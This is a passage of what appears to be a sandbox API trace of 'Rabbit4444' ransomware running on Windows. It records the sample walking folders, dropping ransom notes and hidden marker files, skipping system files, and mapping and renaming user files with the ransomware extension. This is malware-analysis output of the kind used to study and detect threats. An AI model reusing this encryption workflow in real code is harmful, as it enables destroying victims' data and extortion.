lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.144] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.145] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.145] CloseHandle (hObject=0x298) returned 1 [0062.145] CloseHandle (hObject=0x27c) returned 1 [0062.145] GetCurrentThreadId () returned 0xd98 [0062.145] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0062.145] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings" [0062.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124758 | out: hHeap=0xe0000) returned 1 [0062.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0062.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings" [0062.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\" [0062.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0062.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.146] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.149] FlushFileBuffers (hFile=0x27c) returned 1 [0062.150] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.150] CloseHandle (hObject=0x27c) returned 1 [0062.151] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings") returned 87 [0062.151] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.151] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935bacb1, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935c355f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee5e103f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0062.151] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.151] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.151] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.151] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.151] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935bacb1, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935c355f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee5e103f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.152] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.152] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.152] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.152] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee5e103f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee5e103f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee5e103f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.152] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935c355f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935c355f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x935c355f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0062.152] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0062.152] lstrcpyW (in: lpString1=0x130ebe8, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0062.152] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0062.153] lstrlenW (lpString="roaming.lock") returned 12 [0062.153] lstrlenW (lpString="Rabbit4444") returned 10 [0062.153] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0062.154] lstrlenW (lpString=".dll") returned 4 [0062.154] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0062.154] lstrlenW (lpString=".lnk") returned 4 [0062.154] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0062.154] lstrlenW (lpString=".ini") returned 4 [0062.154] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0062.154] lstrlenW (lpString=".sys") returned 4 [0062.154] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0062.154] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935bfac7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935bfac7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0062.154] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0062.154] lstrcpyW (in: lpString1=0x130ebe8, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0062.154] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0062.155] lstrlenW (lpString="settings.dat") returned 12 [0062.155] lstrlenW (lpString="Rabbit4444") returned 10 [0062.155] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0062.155] lstrlenW (lpString=".dll") returned 4 [0062.155] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0062.155] lstrlenW (lpString=".lnk") returned 4 [0062.155] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0062.155] lstrlenW (lpString=".ini") returned 4 [0062.155] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0062.155] lstrlenW (lpString=".sys") returned 4 [0062.155] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0062.155] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.156] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.156] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15346655586) returned 1 [0062.156] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0062.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0062.156] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0062.156] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0062.157] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0062.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0062.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0062.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0062.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0062.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0062.160] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15347082692) returned 1 [0062.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0062.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0062.160] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.160] CloseHandle (hObject=0x260) returned 1 [0062.160] CloseHandle (hObject=0x298) returned 1 [0062.160] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 111 [0062.161] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0062.162] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935bfac7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935bfac7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0062.162] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0062.162] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.163] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.163] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.164] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.164] CloseHandle (hObject=0x298) returned 1 [0062.164] CloseHandle (hObject=0x27c) returned 1 [0062.164] GetCurrentThreadId () returned 0xd98 [0062.164] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0062.164] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState" [0062.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0062.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0062.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState" [0062.164] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\" [0062.165] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0062.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.166] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.168] FlushFileBuffers (hFile=0x27c) returned 1 [0062.169] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.169] CloseHandle (hObject=0x27c) returned 1 [0062.170] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState") returned 91 [0062.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.170] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b376c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239c8b0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee609838, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0062.170] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.170] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.170] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.170] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.170] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b376c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239c8b0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee609838, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.170] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.170] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.170] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.170] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.170] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.171] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee609838, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee609838, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee609838, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.171] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.171] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.171] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee609838, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee609838, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee609838, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.171] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0062.171] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.172] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.172] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.172] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.172] CloseHandle (hObject=0x298) returned 1 [0062.172] CloseHandle (hObject=0x27c) returned 1 [0062.172] GetCurrentThreadId () returned 0xd98 [0062.172] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0062.172] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState" [0062.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e380 | out: hHeap=0xe0000) returned 1 [0062.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0062.172] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState" [0062.172] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\" [0062.172] lstrcatW (in: 